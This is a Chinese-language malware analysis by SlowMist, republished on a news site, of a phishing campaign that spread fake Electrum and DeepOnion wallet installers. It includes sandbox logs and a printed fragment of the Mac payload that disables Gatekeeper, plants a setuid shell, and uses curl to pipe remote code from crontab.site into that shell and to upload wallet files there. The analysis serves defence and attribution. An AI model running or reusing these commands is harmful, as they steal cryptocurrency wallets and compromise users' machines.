客服QQ:872490018

慢雾:伪 Electrum 鱼叉钓鱼攻击分析

By:爱上平顶山@慢雾安全团队

前言

近日,慢雾安全团队收到情报,有专业黑产团队针对交易所用户进行大规模邮件批量撒网钓鱼攻击。

钓鱼邮件如图:


慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

慢雾安全团队收到情报后,第一时间展开分析。

以下是详细分析过程:

攻击细节

我们点击跳转目标页面:


慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

从上图可以看到,针对 Mac OS X / macOS / Windows 不同系统都给出了下载链接;链接指向黑客木马文件存放位置。


慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

于 3 天前,创建的账号,里面存在两个项目:

b*****.github.io

b****t


慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

上图样本 “Bi****-Setup.exe” 是 Windows 下的恶意文件。

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

“index.html” 是一个仿冒的升级提示页面,诱导用户升级下载。

详细分析

接下来我们对Windows端和Mac端分别进行分析:

1.Windows 端

下图为样本 “Bi****-Setup.exe” 数字签名:


慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

(1)EXE 文件基本信息

文件名称:B****-KYC-Setup.exe

子文件信息:

script.txt /  877da6cdd4eb284e2d8887b24a24168c /  Unknown

setup.exe /  fe1818a5e8aed139a8ccf9f60312bb30 /  EXE

WinSCP.exe /  e71c39688fad97b66af3e297a04c3663 /  EXE

(2)关键行为

行为描述: 屏蔽窗口关闭消息

详情信息:hWnd = 0x00030336, Text = Deep Onion Setup: Completed, ClassName = #32770

(3)进程行为

行为描述: 创建本地线程

详情信息:

TargetProcess: %temp%****.exe, InheritedFromPID = 2000, ProcessID = 2888, ThreadID = 2948, StartAddress = 00405209, Parameter = 0001034A
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3188, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3192, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3196, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3200, StartAddress = 00819BF4, Parameter = 0272E270
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3232, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3236, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3240, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3244, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3180, ThreadID = 3248, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3180, ThreadID = 3252, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3264, StartAddress = 009B8C28, Parameter = 026F4B90
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3280, StartAddress = 009B8C28, Parameter = 026F4C90
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3284, StartAddress = 009B8C28, Parameter = 026F4B90
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3352, StartAddress = 009B8C28, Parameter = 026F4B90

4行为描述: 创建新文件进程

详情信息:

[0x00000c30]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_documents.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorMy Documents" "09-06-2020-4:51:51_documents"
[0x00000c44]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_appdata.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorApplication Data" "09-06-2020-4:51:51_appdata"
[0x00000c5c]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_localappdata.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorLocal SettingsApplication Data" "09-06-2020-4:51:51_localappdata"
[0x00000c64]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_onedrive.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorOneDrive" "09-06-2020-4:51:51_onedrive"
[0x00000c6c]ImagePath = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe, CmdLine = "C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:Documents and SettingsAdministratorPictures" "09-06-2020-4:51:51_pictures"

(5)文件行为

行为描述: 创建文件

详情信息:

C:Documents and SettingsAdministratorLocal SettingsTempnsi9.tmp
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesscript.txt
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe
C:Documents and SettingsAdministratorLocal SettingsTempnsyA.tmp
C:Documents and SettingsAdministratorLocal SettingsTempnsyA.tmpSystem.dll
C:Documents and SettingsAdministratorApplication Datawinscp.rnd
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_appdata.log
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_onedrive.log
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_localappdata.log
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_documents.log
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_pictures.log
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesnull

(6)行为描述: 创建可执行文件

详情信息:

C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe
C:Documents and SettingsAdministratorLocal SettingsTempnsyA.tmpSystem.dll

(7)行为描述: 覆盖已有文件

详情信息:

C:Documents and SettingsAdministratorApplication Datawinscp.rnd
C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesnull

(8)行为描述: 查找文件

详情信息:

FileName = C:Documents and Settings
FileName = C:Documents and SettingsAdministrator
FileName = C:Documents and SettingsAdministratorLocal Settings
FileName = C:Documents and SettingsAdministratorLocal SettingsTemp
FileName = C:Documents and SettingsAdministratorLocal Settings%temp%
FileName = C:DOCUME~1ADMINI~1LOCALS~1TempnsyA.tmp
FileName = C:DOCUME~1
FileName = C:DOCUME~1ADMINI~1
FileName = C:DOCUME~1ADMINI~1LOCALS~1
FileName = C:DOCUME~1ADMINI~1LOCALS~1Temp
FileName = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.exe
FileName = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.zh-CN
FileName = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.zh-Hans
FileName = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.zh
FileName = C:DOCUME~1ADMINI~1LOCALS~1Temp.nsis_filesWinSCP.CHS

(9)行为描述: 删除文件

详情信息:

C:Documents and SettingsAdministratorLocal SettingsTempnsi9.tmp
C:Documents and SettingsAdministratorLocal SettingsTempnsyA.tmp

(10)行为描述: 修改文件内容

详情信息:

C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe ---> Offset = 0C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe ---> Offset = 32768C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe ---> Offset = 33203C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe ---> Offset = 65971C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesWinSCP.exe ---> Offset = 66905C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filesscript.txt ---> Offset = 0C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe ---> Offset = 0C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe ---> Offset = 24146C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe ---> Offset = 44980C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe ---> Offset = 60884C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_filessetup.exe ---> Offset = 93652C:Documents and SettingsAdministratorLocal SettingsTempnsyA.tmpSystem.dll ---> Offset = 0C:Documents and SettingsAdministratorApplication Datawinscp.rnd ---> Offset = 0C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_appdata.log ---> Offset = 0C:Documents and SettingsAdministratorLocal SettingsTemp.nsis_fileswinscp_appdata.log ---> Offset = 102

(11)网络行为

行为描述: 建立到一个指定的套接字连接

详情信息:

IP: **.138.40.**:128, SOCKET = 0x000001d0

IP: **.138.40.**:128, SOCKET = 0x000001cc

我们测试打开,自解压:

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

结果发现用于上传本地用户信息的 FTP 账号密码,同时有一个正常的 Electrum Installer 文件,一旦用户安装后使用,  Electrum 下输入的敏感信息将被发送到远程恶意 FTP 服务器接收。

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

2020年06月02日 开始,已经有用户陆续中招。

2.Mac 端:

(1)安装命令:

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

(2)脚本内容:

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

(3)恶意地址:https://github.com/deep-onion

(模仿知名项目https://deeponion.org/ 的Github地址 https://github.com/deeponion )

恶意地址下也有两个项目:

deep-onion.github.io

wallet

https://github.com/deep-onion/deep-onion.github.io

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

此文件此处不做分析。

 

(4)Mac 端

https://github.com/deep-onion/wallet

恶意文件是 DeepOnion

慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

执行恶意脚本后是一系列恶意操作,

如:

try {  shell_exec("spctl --master-disable");
$ksh = trim(shell_exec("which ksh")); shell_exec("cp $ksh $homedir/.ksh"); shell_exec("cd $homedir && chown root:wheel .ksh && chmod a+rwxs .ksh");
shell_exec("cd $homedir && echo '#!/bin/bash' > .strtp && echo 'sleep 300' >> .strtp && echo 'curl http://crontab.site/?log=startup&key=startup&id=$id | $homedir/.ksh' >> .strtp && chown root:wheel .strtp && chmod a+x .strtp");
try { $dir = "$homedir/.electrum/wallets"; if (file_exists($dir)) { $files = scandir($dir); foreach ($files as $file) { shell_exec("curl -s --data-binary "@$dir/$file" http://crontab.site/?log=startup&key=$file&id=$id"); } }} catch (Exception $e) { shell_exec('echo "Caught exception: ' . $e->getMessage() . '"' . " >> $log");}
shell_exec("curl -s --data-binary "@$log" http://crontab.site/?log=startup&key=log&id=$id");
whoami >> /tmp/cron.logls -al /Users/ >> /tmp/cron.logls -al $HOMEDIR >> /tmp/cron.logcurl --data-binary "@/tmp/cron.log" http://crontab.site/?log=startup&key=cron.log&id=$UID

大致流程


慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

通过以上一些列操作,从而盗取用户隐私信息。

备注:

C2 信息:

crontab.site

邮箱 alashanvinov@yandex.ru

phone_tag +7.9453949549

注册时间  2020-04-20 17:47:03

过期时间  2021-04-20 23:59:59

更新时间  2020-04-20 17:47:04

慢雾建议

针对本次攻击事件慢雾安全团队建议:

  • 认清官方邮箱后缀

  • 谨慎对待未知来源邮件里的链接与附件

  • 怀疑一切以“升级”、“账号异常”等理由的邮件

  • 对于需要处理但可疑的邮件内容,需及时咨询专业人员

欢迎随时联系慢雾安全团队 Team@slowmist.com

往期回顾

Bitdefender × 慢雾科技 携手共筑区块链生态安全

Akamai 重磅推出 Web 前端安全保护利器 PIM,慢雾协助测试

慢雾协助:Lendf.Me 黑客攻击事件真相还原

慢雾科技发布EOS提案系统(WPS)智能合约安全审计报告

慢雾:详解 Uniswap 的 ERC777 重入风险




慢雾:伪 Electrum 鱼叉钓鱼攻击分析-碳链

慢雾导航


慢雾科技官网

https://www.slowmist.com/


慢雾区官网

https://slowmist.io/


慢雾 GitHub

https://github.com/slowmist


Telegram

https://t.me/slowmistteam


Twitter

https://twitter.com/@slowmist_team


Medium

https://medium.com/@slowmist


币乎

https://bihu.com/people/586104

知识星球

https://t.zsxq.com/Q3zNvvF

火星号

http://t.cn/AiRkv4Gz

*文章为作者独立观点,不代表碳链立场
本文由 慢雾科技 授权 碳链 发表,并经碳链编辑。转载此文章须经作者同意,并请附上出处(碳链)及本页链接。原文链接http://www.itanlian.com/chainnews/3924.html
发表评论
坐等沙发
相关文章
慢雾为香港浸会大学金融硕士课程赞助“慢雾网络安全奖”​
慢雾为香港浸会大学金融硕士课程赞助“慢…
一个知名区块链游戏工作室是如何倒闭的?
一个知名区块链游戏工作室是如何倒闭的?
提问有奖·波卡是否有机会超越以太坊?
提问有奖·波卡是否有机会超越以太坊?
DeFi热潮下的安全隐患:流动性危机恐将造成连锁反应 | 非正式会谈
DeFi热潮下的安全隐患:流动性危机恐将…
慢雾:YFValue,一行代码如何锁定上亿资产
慢雾:YFValue,一行代码如何锁定上亿资产
以太坊五岁了,它现在还好吗?
以太坊五岁了,它现在还好吗?
慢雾科技
SlowMist-Team 作者
我还没有学会写个人说明!
  • 文章

    115

  • 评论

    0

广告赞助